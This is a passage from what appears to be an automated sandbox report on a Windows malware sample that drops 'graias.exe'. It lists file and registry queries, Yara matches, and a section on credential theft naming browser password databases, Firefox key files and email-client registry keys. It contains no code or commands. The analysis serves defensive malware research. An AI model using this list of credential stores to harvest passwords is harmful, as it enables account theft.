                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeQueries volume information: C:\Users\user\AppData\Roaming\Graias\graias.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0516~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\dxdiag.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0110~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00434020 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,5_2_00434020
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_0041A7B2 GetUserNameW,5_2_0041A7B2
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00448067 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,5_2_00448067
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_0041739B GetVersionExW,38_2_0041739B
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                Source: Yara match File source: 0.2.iGhDjzEiDU.exe.43c65b8.3.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.iGhDjzEiDU.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.iGhDjzEiDU.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.iGhDjzEiDU.exe.424d978.4.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.iGhDjzEiDU.exe.43c65b8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.iGhDjzEiDU.exe.424d978.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000002.1688374211.0000000004149000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000002.1688374211.0000000004185000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: iGhDjzEiDU.exe PID: 6984, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: iGhDjzEiDU.exe PID: 2992, type: MEMORYSTR
                Source: Yara match File source: C:\ProgramData\graias\logs.dat, type: DROPPED
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 5_2_0040B21B
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 5_2_0040B335
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: \key3.db 5_2_0040B335
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: ESMTPPassword 39_2_004033F0
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 39_2_00402DB3
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 39_2_00402DB3
                Source: Yara match File source: Process Memory Space: graias.exe PID: 7468, type: MEMORYSTR

                Remote Access Functionality

